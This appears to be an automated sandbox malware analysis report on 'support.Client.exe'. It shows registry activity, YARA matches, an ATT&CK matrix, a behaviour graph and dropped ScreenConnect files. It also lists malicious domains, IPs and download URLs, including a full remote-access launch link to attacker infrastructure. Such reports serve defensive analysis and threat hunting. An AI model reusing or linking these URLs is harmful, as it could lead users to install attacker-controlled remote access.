                Source: C:\Users\user\Desktop\support.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\support.Client.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                Source: Yara matchFile source: 00000002.00000002.3936944841.000001C1FEF44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3152147048.000000001B2EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000000.3138042328.0000000000502000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3150883243.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3921451450.000001C1E3F04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 2084, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6324, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 6360, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
                Windows Management Instrumentation                		2
                Windows Service                		2
                Windows Service                		11
                Masquerading                		OS Credential Dumping41
                Security Software Discovery                		Remote ServicesData from Local System1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter                		1
                Scheduled Task/Job                		12
                Process Injection                		1
                Modify Registry                		LSASS Memory2
                Process Discovery                		Remote Desktop ProtocolData from Removable Media1
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job                		1
                Bootkit                		1
                Scheduled Task/Job                		21
                Disable or Modify Tools                		Security Account Manager61
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		61
                Virtualization/Sandbox Evasion                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchd1
                DLL Search Order Hijacking                		1
                DLL Search Order Hijacking                		12
                Process Injection                		LSA Secrets1
                File and Directory Discovery                		SSHKeylogging3
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Hidden Users                		Cached Domain Credentials44
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Bootkit                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Timestomp                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Search Order Hijacking                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1663841 Sample: support.Client.exe Startdate: 12/04/2025 Architecture: WINDOWS Score: 63 48 web.updhelp.top 2->48 50 pilwerui.rchelp.top 2->50 52 bg.microsoft.map.fastly.net 2->52 60 Antivirus detection for URL or domain 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 .NET source code references suspicious native API functions 2->64 66 3 other signatures 2->66 9 ScreenConnect.ClientService.exe 2->9         started        13 support.Client.exe 2 2->13         started        15 svchost.exe 6 2->15         started        17 3 other processes 2->17 signatures3 process4 dnsIp5 56 pilwerui.rchelp.top 217.156.123.36, 60861, 8880 ASMMCPiataUniriinr3RO Romania 9->56 74 Reads the Security eventlog 9->74 76 Reads the System eventlog 9->76 19 ScreenConnect.WindowsClient.exe 9->19         started        22 ScreenConnect.WindowsClient.exe 9->22         started        24 dfsvc.exe 132 105 13->24         started        28 WerFault.exe 11 13 13->28         started        30 WerFault.exe 2 15->30         started        signatures6 process7 dnsIp8 68 Contains functionality to hide user accounts 19->68 54 web.updhelp.top 104.21.48.239, 443, 60842, 60843 CLOUDFLARENETUS United States 24->54 40 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 24->40 dropped 42 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 24->42 dropped 44 ScreenConnect.WindowsBackstageShell.exe, PE32 24->44 dropped 46 13 other files (none is malicious) 24->46 dropped 32 ScreenConnect.WindowsClient.exe 24->32         started        35 conhost.exe 30->35         started        file9 signatures10 process11 signatures12 58 Contains functionality to hide user accounts 32->58 37 ScreenConnect.ClientService.exe 32->37         started        process13 signatures14 70 Contains functionality to hide user accounts 37->70 72 Enables network access during safeboot for specific services 37->72

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                support.Client.exe26%ReversingLabsWin32.PUA.ScreenConnect
                SAMPLE100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exe4%ReversingLabs
                C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Client.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.ClientService.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.ClientService.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Core.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Windows.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsClient.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsFileManager.exe4%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://web.updhelp.top/Bin/ScreenConnect.Client.manifest(100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configQfg100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Client.application6.VGOq100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Core.dll100%Avira URL Cloudmalware
                http://www.rg/2001/XMLSchema-instance6urn:schemas-microsoft-com:asm.v10%Avira URL Cloudsafe
                http://www.xrml.org/schema/2001/11/xrml2core=0%Avira URL Cloudsafe
                https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exe100%Avira URL Cloudmalware
                http://sajatypeworks.comk0%Avira URL Cloudsafe
                https://web.updhelp.top/Bin/ScreenConnect.Clie100%Avira URL Cloudmalware
                http://sajatypeworks.comi0%Avira URL Cloudsafe
                https://web.updhelp.top/Bin/ScreenConnect.ClientService.dll100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsC100%Avira URL Cloudmalware
                https://web.upH0%Avira URL Cloudsafe
                https://web.updhelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=BgIAAACkAABSU0ExAAgAAAEAAQCFVe49RH8w3PHHeO1qVSBr4d2sU0V6TqcGbDS6EEXrvVeV3soat%2b%2be7pjtKgmoYVSxtAgqBJFx3x%2bu%2fgeS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2be2Q2vOc7WrnUjiGs7o7fZ9oSw384B%2f9gNelOJnoEsAbyt&r=&i=Untitled%20Session100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Windows.dll100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe2100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Client.applicationication100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exeL100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configGfi100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Client.application.exe100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.ClientService.dlll100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.ClientService.exeHL100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Client.application8100%Avira URL Cloudmalware
                https://scripts.sil.org/OFL0%Avira URL Cloudsafe
                https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exe100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe100%Avira URL Cloudmalware
                https://web.updhelp.SCRECO~1.MANnt.applicaFXE0%Avira URL Cloudsafe
                https://web.updhelp.top100%Avira URL Cloudmalware
                https://web.updhelp.topxz0%Avira URL Cloudsafe
                http://web.updhelp.top100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeU100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Client.application089I8100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Client.applicationLW6.VGO100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Client.dll100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Client.manifesti100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Client.application_100%Avira URL Cloudmalware
                https://web.updhelp.S0%Avira URL Cloudsafe
                https://web.updhelp.top/Bin/ScreenConnect.Client.manifest100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.e100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pilwerui.rchelp.top100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.ClientSe100%Avira URL Cloudmalware
                http://cacerts.digicert.c0%Avira URL Cloudsafe
                https://web.updhelp.top/Bin/ScreenConnect.Client.manifestY100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Wind100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exe.config_100%Avira URL Cloudmalware
                http://schemas.microsA0%Avira URL Cloudsafe
                https://web.upHzN0%Avira URL Cloudsafe
                https://web.updhelp.top/Bin/ScreenConnect.Client.application100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Client.applicationP100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.ClientService.exe100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exX100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Client.applicationLW6.VGOj100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.Client.applicationdb01k100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.ex100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManag(100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstage100%Avira URL Cloudmalware
                https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exe.config100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                		199.232.210.172
                		truefalse
                  		high
                  web.updhelp.top
                  		104.21.48.239
                  		truefalse
                    		unknown
                    pilwerui.rchelp.top
                    		217.156.123.36
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exefalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://web.updhelp.top/Bin/ScreenConnect.Core.dllfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://web.updhelp.top/Bin/ScreenConnect.ClientService.dllfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://web.updhelp.top/Bin/ScreenConnect.Windows.dllfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://web.updhelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=BgIAAACkAABSU0ExAAgAAAEAAQCFVe49RH8w3PHHeO1qVSBr4d2sU0V6TqcGbDS6EEXrvVeV3soat%2b%2be7pjtKgmoYVSxtAgqBJFx3x%2bu%2fgeS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2be2Q2vOc7WrnUjiGs7o7fZ9oSw384B%2f9gNelOJnoEsAbyt&r=&i=Untitled%20Sessionfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.configfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exefalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exefalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://web.updhelp.top/Bin/ScreenConnect.Client.dllfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://web.updhelp.top/Bin/ScreenConnect.Client.manifestfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://web.updhelp.top/Bin/ScreenConnect.ClientService.exefalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exe.configfalse
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://web.updhelp.top/Bin/ScreenConnect.Client.manifest(dfsvc.exe, 00000002.00000002.3936662225.000001C1FEF14000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://web.updhelp.top/Bin/ScreenConnect.Client.application6.VGOqdfsvc.exe, 00000002.00000002.3937485355.000001C1FEFEB000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.fontbureau.com/designersGdfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com/designers/?dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configQfgdfsvc.exe, 00000002.00000002.3937277044.000001C1FEFC6000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.fontbureau.com/designers?dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.xrml.org/schema/2001/11/xrml2core=dfsvc.exe, 00000002.00000002.3921451450.000001C1E3B95000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://sajatypeworks.comidfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.rg/2001/XMLSchema-instance6urn:schemas-microsoft-com:asm.v1dfsvc.exe, 00000002.00000002.3936210855.000001C1FEEC3000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://web.updhelp.top/Bin/ScreenConnect.Cliedfsvc.exe, 00000002.00000002.3921451450.000001C1E42D3000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://sajatypeworks.comkdfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.tiro.comdfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://web.updhelp.top/Bin/ScreenConnect.WindowsCdfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.fontbureau.com/designersdfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://web.updhelp.top/Bin/ScreenConnect.Client.applicationicationdfsvc.exe, 00000002.00000002.3935908647.000001C1FEE8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://web.upHdfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E42D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe2dfsvc.exe, 00000002.00000002.3937485355.000001C1FEFEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configGfidfsvc.exe, 00000002.00000002.3937277044.000001C1FEFC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.sajatypeworks.comdfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://web.updhelp.top/Bin/ScreenConnect.Client.application.exedfsvc.exe, 00000002.00000002.3935908647.000001C1FEE8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exeLdfsvc.exe, 00000002.00000002.3934976375.000001C1FE930000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmdfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.w3.dfsvc.exe, 00000002.00000002.3937395741.000001C1FEFD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://web.updhelp.top/Bin/ScreenConnect.ClientService.dllldfsvc.exe, 00000002.00000002.3934976375.000001C1FE930000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://web.updhelp.top/Bin/ScreenConnect.ClientService.exeHLdfsvc.exe, 00000002.00000002.3936379230.000001C1FEEE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://scripts.sil.org/OFLdfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleasedfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://web.updhelp.topdfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E42D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://web.updhelp.top/Bin/ScreenConnect.Client.application8dfsvc.exe, 00000002.00000002.3921451450.000001C1E3F04000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3150883243.0000000002981000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.urwpp.deDPleasedfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000002.00000002.3921451450.000001C1E3B11000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000011.00000002.4168160767.00000000019C3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.4165858393.000000000329F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sakkal.comdfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://web.updhelp.topxzdfsvc.exe, 00000002.00000002.3921451450.000001C1E3D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://web.updhelp.SCRECO~1.MANnt.applicaFXEdfsvc.exe, 00000002.00000002.3937485355.000001C1FEFEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://web.updhelp.topdfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E42D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeUdfsvc.exe, 00000002.00000002.3937485355.000001C1FEFEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.apache.org/licenses/LICENSE-2.0dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.comdfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://web.updhelp.top/Bin/ScreenConnect.Client.applicationLW6.VGOdfsvc.exe, 00000002.00000002.3937485355.000001C1FEFEB000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3149557783.0000000000ABE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://web.updhelp.top/Bin/ScreenConnect.Client.manifestidfsvc.exe, 00000002.00000002.3932098452.000001C1FC69D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://web.updhelp.top/Bin/ScreenConnect.Client.application089I8dfsvc.exe, 00000002.00000002.3935908647.000001C1FEE8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://web.updhelp.Sdfsvc.exe, 00000002.00000002.3937485355.000001C1FEFEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://web.updhelp.top/Bin/ScreenConnect.Client.application_dfsvc.exe, 00000002.00000002.3935908647.000001C1FEE8A000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3935451395.000001C1FEE43000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3149557783.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3149557783.0000000000ABE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000002.00000002.3921451450.000001C1E3B95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
